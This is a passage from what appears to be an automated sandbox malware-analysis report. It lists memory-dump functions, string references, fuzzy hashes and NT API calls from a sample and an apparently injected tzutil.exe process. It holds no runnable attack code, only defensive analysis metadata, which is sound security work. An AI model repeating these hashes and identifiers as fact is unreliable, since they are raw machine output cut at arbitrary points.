o, xrefs: 03214140
l, xrefs: 0321414E

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: be7fd17b589048eba510f4eea10965fa752e30c56ceb588266d9b180c8be972b
Instruction ID: ff4a7097f8f46dd4f59bc541b008261875af4b69e32ec6760bd8a3659956fcdf
Opcode Fuzzy Hash: be7fd17b589048eba510f4eea10965fa752e30c56ceb588266d9b180c8be972b
Instruction Fuzzy Hash: F26161B1910309AFCB24DBA5CD80FEFB7FDAB98700F14455CE619A7240E775AA91CB60

Function 032140FC Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

i, xrefs: 03214147
, xrefs: 03214132
u, xrefs: 03214139
o, xrefs: 03214140
l, xrefs: 0321414E

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: d9cb6cae4492e8b04739e11ced3e2a302ef353f4e998f2e952466c95d798f3fa
Instruction ID: d62abdfd412e72df3e830e7125af9871d57cd18466aa2bd2b05721556959d8f0
Opcode Fuzzy Hash: d9cb6cae4492e8b04739e11ced3e2a302ef353f4e998f2e952466c95d798f3fa
Instruction Fuzzy Hash: EB413CB1910309AFDB20DFA5CC84FEFBBFDAB88700F104559E659A7240D771AA81CB60

Function 03213D89 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

o, xrefs: 03213DC2
k, xrefs: 03213DC9
, xrefs: 03213DBB
e, xrefs: 03213DD0

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: b6f0652da7f0ba63b74a2025a3e0b7df8894a4cba5d83c838fb96ca204a49596
Instruction ID: eccbaf25f21ed0d98c8bcbcb153df85dc26b81739014ac3b5f76e828829afa83
Opcode Fuzzy Hash: b6f0652da7f0ba63b74a2025a3e0b7df8894a4cba5d83c838fb96ca204a49596
Instruction Fuzzy Hash: E0B14DB5A00309AFDB24DBA4CD80FEFB7F9AF88700F248558F619A7240D675AA51CB50

Function 032146CC Relevance: 5.2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

Strings

h, xrefs: 032147A2
, xrefs: 0321479B
e, xrefs: 032147B0
o, xrefs: 032147A9

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 244c2086de3b7539dc77194714ec2dff0b9c8b14e6fc1f163271da9c806b2aca
Instruction ID: bd8b9f111189209ca832370401956b716676502c9d121d2254210f7e7cd5fafb
Opcode Fuzzy Hash: 244c2086de3b7539dc77194714ec2dff0b9c8b14e6fc1f163271da9c806b2aca
Instruction Fuzzy Hash: 3C815976C203697EDB25EB50DC40FEEB37DAF58700F50859AA5097A041EBB45B84CFA1

Function 03213D8C Relevance: 5.2, Strings: 4, Instructions: 181COMMON

Download Yara Rule

Strings

o, xrefs: 03213DC2
k, xrefs: 03213DC9
, xrefs: 03213DBB
e, xrefs: 03213DD0

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: d354cf15014c894257f04b862a91368e96cd37eb28474a3d81fe26cca93e97b9
Instruction ID: 5b46f1175c587d3cde9bc9c3a2612d969ddaa96002b511eff8e308d8c53bcd30
Opcode Fuzzy Hash: d354cf15014c894257f04b862a91368e96cd37eb28474a3d81fe26cca93e97b9
Instruction Fuzzy Hash: 9E612AB5A10309AFDB64DFA4CD84FAFB7FDAF88700F248558E6199B240D771AA41CB50

Function 03213C4C Relevance: 5.1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

Strings

TRUE, xrefs: 03213CB6, 03213CB9
TRUE, xrefs: 03213D49
FALSETRUE, xrefs: 03213CCC, 03213CD1
FALSETRUE, xrefs: 03213CF4, 03213CF7

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 2e4da4efdec5525734b406601c2a4f243eae3d2c4a9040ba53b8cbb6a2dddaaf
Instruction ID: d85ae7442d59b78f6b9fcf17428dec97b36bcf8cc644e003321f98374b3d9f6b
Opcode Fuzzy Hash: 2e4da4efdec5525734b406601c2a4f243eae3d2c4a9040ba53b8cbb6a2dddaaf
Instruction Fuzzy Hash: 354121755612287AEB01EB94CC41FEFBB7CAF56700F108148FA046A181D7F46A5587FA

Function 0320FECC Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

S, xrefs: 0320FFA9
q, xrefs: 0320FF94
1, xrefs: 0320FFA2
a, xrefs: 0320FF9B

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: 1$S$a$q
API String ID: 0-3227106001
Opcode ID: 3faa995693ff39e879b16b3f75a5fda1a18b1a09fded8f53c580687d705e4cd5
Instruction ID: 83f8d3294daf0e09a9579c9a1e8c343bb1634fffb3ff6d6f575c7a15a7bc1270
Opcode Fuzzy Hash: 3faa995693ff39e879b16b3f75a5fda1a18b1a09fded8f53c580687d705e4cd5
Instruction Fuzzy Hash: 1C3168B5D20219BBDB14DB94CD45BFEB7B8EF09304F104198F904AB280E7B59B448BE5

Function 031FD54C Relevance: 5.0, Strings: 4, Instructions: 23COMMON

Download Yara Rule

Strings

|6zwi~, xrefs: 031FD57D, 031FD586
i~, xrefs: 031FD569
G, xrefs: 031FD572
|6zw, xrefs: 031FD562

Memory Dump Source

Source File: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2f40000_GxqFOvQfqyr.jbxd

Yara matches

Similarity

API ID:
String ID: G$i~$|6zw$|6zwi~
API String ID: 0-690696863
Opcode ID: 3903fc2bc6ecb5dc0822f75990164eb027f1922fdf5d73e7f16a3f575deab0e1
Instruction ID: db6572335a0aa93827fbc98cf2285ed7836b3e260dccd486c435b2d3c469a3ce
Opcode Fuzzy Hash: 3903fc2bc6ecb5dc0822f75990164eb027f1922fdf5d73e7f16a3f575deab0e1
Instruction Fuzzy Hash: 83E092B1D1024CAACB00EFE9D8016AEBB34BB05200F2489D9C9549B251D774CA04C79A

Analysis Process: tzutil.exePID: 6496, Parent PID: 2296COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.6%
Total number of Nodes:	437
Total number of Limit Nodes:	70

Executed Functions

Function 032DC6B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 032DC794
FindNextFileW.KERNELBASE(?,00000010), ref: 032DC7CF
FindClose.KERNELBASE(?), ref: 032DC7DA

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a742c8b730cba958d58ca9a4830f7349d4117fc18b8c5cd605e1f2e852c0ec47
Instruction ID: 8bdefdf97e6f39e8e022cd09253d94caf0021507185de79d4f70e8ec58c6a5f9
Opcode Fuzzy Hash: a742c8b730cba958d58ca9a4830f7349d4117fc18b8c5cd605e1f2e852c0ec47
Instruction Fuzzy Hash: 3931C3B5910319BBEB20DF60CC86FEF777CDB44744F144558B908AB180EAB0AAD4CBA0

Function 032E90D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 032E91CE

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99faf70863d165c3310beeed44be0cd29308776427cac63339398d538280c57b
Instruction ID: 6b706b2cdec50dfd0ff4899ff1b846a65cb584ddeda0886b099fbb5d8f07c942
Opcode Fuzzy Hash: 99faf70863d165c3310beeed44be0cd29308776427cac63339398d538280c57b
Instruction Fuzzy Hash: 2431D2B5A10348AFCB14DF98C881EDEB7B9EF88714F508219F918AB344D770A951CBA1

Function 032E9240 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 032E9323

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8b26881303fe9a670bc3235135e075de32f56803a2ecf2a0325da6929d36a8f7
Instruction ID: 76e2b1116b9249a64150fbe3dd0123bc69c983a58e741901b1bad507e6a096c7
Opcode Fuzzy Hash: 8b26881303fe9a670bc3235135e075de32f56803a2ecf2a0325da6929d36a8f7
Instruction Fuzzy Hash: 9331F7B5A10348AFDB14DF98C881EDFB7B9EF88714F508209F918AB344D770A951CBA5

Function 032E9530 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(032D1DDE,?,032E807E,00000000,00000004,00003000,?,?,?,?,?,032E807E,032D1DDE), ref: 032E95F5

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: dbb08259de3de3a835e7d35d22572d4347f58a3a7084e7cb8c140c025f6fa429
Instruction ID: bdee93e53f8c7434bb4f4c6869f9de3dae7e684c2222680b3b48c4f6aaf67a27
Opcode Fuzzy Hash: dbb08259de3de3a835e7d35d22572d4347f58a3a7084e7cb8c140c025f6fa429
Instruction Fuzzy Hash: CA212BB5A10349AFDB14DF98CC41EEF77B9EF88700F508509F918AB244D7B0A951CBA1

Function 032E9330 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 032E93C3

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6ede13e0a5782e476506ffa381bc4429ef73809e9999648bd6c5f1ea996f4885
Instruction ID: 6b227cb86f4f3612166ccc44758013f9f0af1d1b31e93f7b2ede303bfe08787c
Opcode Fuzzy Hash: 6ede13e0a5782e476506ffa381bc4429ef73809e9999648bd6c5f1ea996f4885
Instruction Fuzzy Hash: 6C11C675A10304BED620EB68CC42FDF776CDF85714F408509F9089B280E7B0B651C7A1

Function 032E93D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(032E1851,?,780157A5,?,?,032E1851,?,35262E7A,?,?,?,?,?,?,00000000,B783F5B3), ref: 032E9404

Memory Dump Source

Source File: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32c0000_tzutil.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction ID: 87cede33cc090d0a907f1983d4d7c9fab4f86bb67e55818d20975ef290fac267
Opcode Fuzzy Hash: 3d1c18abf690c68af00b4f598ef74a1842629c4662bdc5406d3ab33d1fc998b6
Instruction Fuzzy Hash: A7E0463A2603047BD220FA59DC01E9BB76CEBC5760F418419FA18AB242DAB0BA1187A0

Function 03B64340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B6434A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb37e0cb56210755480a5690ec2eb406026105dfe97b81091967fa75dfa5f038
Instruction ID: 22d2cc22636fbaea64f6409db93ae7daf99bd89aefce54637b5579d6573aad08
Opcode Fuzzy Hash: eb37e0cb56210755480a5690ec2eb406026105dfe97b81091967fa75dfa5f038
Instruction Fuzzy Hash: A4900232605804129140B15848895464005D7E0305B55C071E0528559C8B148A565361

Function 03B64650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B6465A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86d073ee0bd739369d168bdc64324f1026f0cec69cab7fb6df2d0d8c1f9eff73
Instruction ID: b7675980cd7630a1cbde929530d93e83370f22d1803880942dbc60cd68b241a0
Opcode Fuzzy Hash: 86d073ee0bd739369d168bdc64324f1026f0cec69cab7fb6df2d0d8c1f9eff73
Instruction Fuzzy Hash: 5A900262601504424140B15848094066005D7E1305395C175A0658565C871889559269

Function 03B62BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62BAA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71ebd5f85adb83988b46b8f070fd0a74c6395af136662a7314035e2449ad9738
Instruction ID: 00d3692c046326129fc592feadf0a141e71dab4986114d9d1be4cbc0668fbb9e
Opcode Fuzzy Hash: 71ebd5f85adb83988b46b8f070fd0a74c6395af136662a7314035e2449ad9738
Instruction Fuzzy Hash: 4790023260540C02D150B15844197460005C7D0305F55C071A0128659D87558B5576A1

Function 03B62BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62BFA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25dd047a365df98767519ffeed21ba3d5b7b98a888faad4b7e4b039bea7e3638
Instruction ID: ea83d97ce2c2458cc0e0aaaa939250b14ed843b9d5b99a461ff71f7fd83ba1d6
Opcode Fuzzy Hash: 25dd047a365df98767519ffeed21ba3d5b7b98a888faad4b7e4b039bea7e3638
Instruction Fuzzy Hash: AA90023220140C02D180B158440964A0005C7D1305F95C075A0129659DCB158B5977A1

Function 03B62BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62BEA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4880fbe8b81466148ee0a8d8efcf9c65886c9215ff76891d96769489821d2e7b
Instruction ID: a21c5f0e3fa975f9e63ab5d2a1d5478a9d2177d45f492226a0590164ef8b5f83
Opcode Fuzzy Hash: 4880fbe8b81466148ee0a8d8efcf9c65886c9215ff76891d96769489821d2e7b
Instruction Fuzzy Hash: 9A90023220544C42D140B1584409A460015C7D0309F55C071A0168699D97258E55B661

Function 03B62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62B6A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5102c1d9e340c193d2bcb4f196c2a83beb805c5cfaf4e88dc5589dee7a0fe6a0
Instruction ID: a9975d60158004aae9ea6349da9dd1b4522425a1076eeaabc380fce6c9bfc52b
Opcode Fuzzy Hash: 5102c1d9e340c193d2bcb4f196c2a83beb805c5cfaf4e88dc5589dee7a0fe6a0
Instruction Fuzzy Hash: 13900262202404034105B1584419616400AC7E0205B55C071E1118595DC62589916125

Function 03B62AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62AFA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1c424632c772d4ddd4608ebd8a26fbc8ff43aa536c61ecd762b91ed6951762b
Instruction ID: 0aebbcfcb6623924051c14448a3bc03205033e57f019af9bbd19c667926d911d
Opcode Fuzzy Hash: e1c424632c772d4ddd4608ebd8a26fbc8ff43aa536c61ecd762b91ed6951762b
Instruction Fuzzy Hash: F8900226221404020145F558060950B0445D7D6355395C075F151A595CC72189655321

Function 03B62AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62ADA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e54c876ff034cff1e7b97942954efa779c9d8e977c1eb41febb4e44978d83bcc
Instruction ID: b60cd7a6263566eb02dfaf7f7859397de122323ed1d30e7eeddf5e10b37f8a52
Opcode Fuzzy Hash: e54c876ff034cff1e7b97942954efa779c9d8e977c1eb41febb4e44978d83bcc
Instruction Fuzzy Hash: 6D900437311404030105F55C070D5070047C7D5355355C071F111D555CD731CD715131

Function 03B62FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62FBA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2adab96c9249a6c219cecde560729567a22fa106c69651b1aff16d3a1d1e6c9
Instruction ID: 53dc8fd2c91c7e38851f7e0e785685084b6364a3098348ddb337d70f214c3389
Opcode Fuzzy Hash: d2adab96c9249a6c219cecde560729567a22fa106c69651b1aff16d3a1d1e6c9
Instruction Fuzzy Hash: 3D900222601404424140B16888499064005EBE1215755C171A0A9C555D865989655665

Function 03B62FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62FEA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a78150cd4ef19ff2da41dd99b4fdae0c1516aacac6a559812618d298aecace3d
Instruction ID: 735463f75ae65b5e2fe11a58fbe6108801c41e856703d2512bed9e3975763921
Opcode Fuzzy Hash: a78150cd4ef19ff2da41dd99b4fdae0c1516aacac6a559812618d298aecace3d
Instruction Fuzzy Hash: 54900222211C0442D200B5684C19B070005C7D0307F55C175A0258559CCA1589615521

Function 03B62F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62F3A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f71d253dcd2688353289b4dac401aaa7db53681feaf7d65d43deb60ddc496ae
Instruction ID: 21bf91a2f7cc06f20320fcd129541119c84d12ace599eafb048324739d0812b3
Opcode Fuzzy Hash: 7f71d253dcd2688353289b4dac401aaa7db53681feaf7d65d43deb60ddc496ae
Instruction Fuzzy Hash: 9C90026234140842D100B1584419B060005C7E1305F55C075E1168559D8719CD526126

Function 03B62E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62E8A

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b499c42eeea72d43d753c2f5ba29b80a9b1da310a7115664d6a3e8ee2465ad85
Instruction ID: dc68a86b01d1fe3490667145e4a42d4b388a1fe4c58f534d438385ced1c34e26
Opcode Fuzzy Hash: b499c42eeea72d43d753c2f5ba29b80a9b1da310a7115664d6a3e8ee2465ad85
Instruction Fuzzy Hash: 6790022260140902D101B1584409616000AC7D0245F95C072A112855AECB258A92A131

Function 03B62EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03B62EEA

Memory Dump Source

Source File: 00000006.00000002.4510916318.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AF0000, based on PE: true

Associated: 00000006.00000002.4510916318.0000000003C19000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4510916318.0000000003C8E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3af0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 255c2de82c24641b5a70cbd6e4a986752bdc3254e36da34a4cd724338a29560e
Instruction ID: fa7cd39ffa200399b8ad3984e73a5fc10be9662008937c3d5fbd174244dd6612
Opcode Fuzzy Hash: 255c2de82c24641b5a70cbd6e4a986752bdc3254e36da34a4cd724338a29560e
Instruction Fuzzy Hash: 6B90026220180803D140B55848096070005C7D0306F55C071A216855AE8B298D516135

Function 03B62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

